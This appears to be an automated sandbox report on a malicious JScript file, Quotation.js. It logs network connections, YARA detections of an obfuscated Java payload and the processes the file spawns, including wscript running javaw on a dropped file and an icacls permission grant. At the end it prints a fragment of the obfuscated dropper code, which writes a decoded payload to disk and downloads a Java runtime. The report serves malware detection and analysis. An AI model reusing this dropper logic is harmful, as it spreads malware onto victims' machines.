Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867

Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49886 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49904 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49931 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49942 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49964 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49968 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: Process Memory Space: javaw.exe PID: 7588, type: MEMORYSTR	Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Source: Quotation.js

Initial sample: Strings found which are bigger than 50

Source: 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: Process Memory Space: javaw.exe PID: 7588, type: MEMORYSTR	Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator

Source: classification engine

Classification label: mal92.troj.evad.winJS@6/4@5/2

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\nvbyatbnf.txt

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Mutant created: NULL

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Quotation.js

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\nvbyatbnf.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\nvbyatbnf.txt"	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript[CklqdFL[47]](CklqdFL[4]);var xExBLqTbXh = kYfpnX_qCl[CklqdFL[48]](CklqdFL[5]);var izPTBQ_jTC = kYfpnX_qCl[CklqdFL[48]](CklqdFL[6]);var r = Math[CklqdFL[50]]()[CklqdFL[51]](36)[CklqdFL[46]](/[^a-z]+/g, '')[CklqdFL[53]](0, 10);var JlhwENqfnl = izPTBQ_jTC + CklqdFL[7] + r + CklqdFL[8]var ZaAtmiMBKG = decodeBase64(N$cvYJbgCP);writeBytes(JlhwENqfnl, ZaAtmiMBKG);var PajvHKk$Px = WScript[CklqdFL[47]](CklqdFL[9]);var KewZ$_ybVX = "";try{KewZ$_ybVX = kYfpnX_qCl[CklqdFL[55]](CklqdFL[10]);KewZ$_ybVX = kYfpnX_qCl[CklqdFL[55]](CklqdFL[11] + KewZ$_ybVX + CklqdFL[12]);}catch(err){}try{if(KewZ$_ybVX == ""){KewZ$_ybVX = kYfpnX_qCl[CklqdFL[55]](CklqdFL[13]);KewZ$_ybVX = kYfpnX_qCl[CklqdFL[55]](CklqdFL[14] + KewZ$_ybVX + CklqdFL[12]);if(KewZ$_ybVX != ""){KewZ$_ybVX = KewZ$_ybVX + CklqdFL[16];}}else{KewZ$_ybVX = KewZ$_ybVX + CklqdFL[16];}}catch(err){}try{if(KewZ$_ybVX != ""){kYfpnX_qCl[CklqdFL[59]](CklqdFL[18] + KewZ$_ybVX + CklqdFL[19] + JlhwENqfnl + CklqdFL[18]);} else{GrabJreFromNet();}} catch(err){}function GrabJreFromNet(){do{try{var aPMLihZuGt = WScript[CklqdFL[47]](CklqdFL[21]);var dKx_NIcKPU = WScript[CklqdFL[47]](CklqdFL[22]);aPMLihZuGt[CklqdFL[62]](CklqdFL[23], CklqdFL[24], false);aPMLihZuGt[CklqdFL[63]](2, 13056);aPMLihZuGt[CklqdFL[64]]();dKx_NIcKPU[CklqdFL[65]] = 1;dKx_NIcKPU[CklqdFL[62]]();dKx_NIcKPU.write(aPMLihZuGt[CklqdFL[67]]);dKx_NIcKPU[CklqdFL[68]](izPTBQ_jTC + CklqdFL[25], 2);break;}catch(err){WScript[CklqdFL[69]](5000);}}while(true);UnZip(izPTBQ_jTC + CklqdFL[25], izPTBQ_jTC + CklqdFL[27]);kYfpnX_qCl[CklqdFL[70]](CklqdFL[28], CklqdFL[18] + izPTBQ_jTC + CklqdFL[30] + CklqdFL[18] + JlhwENqfnl + CklqdFL[18], 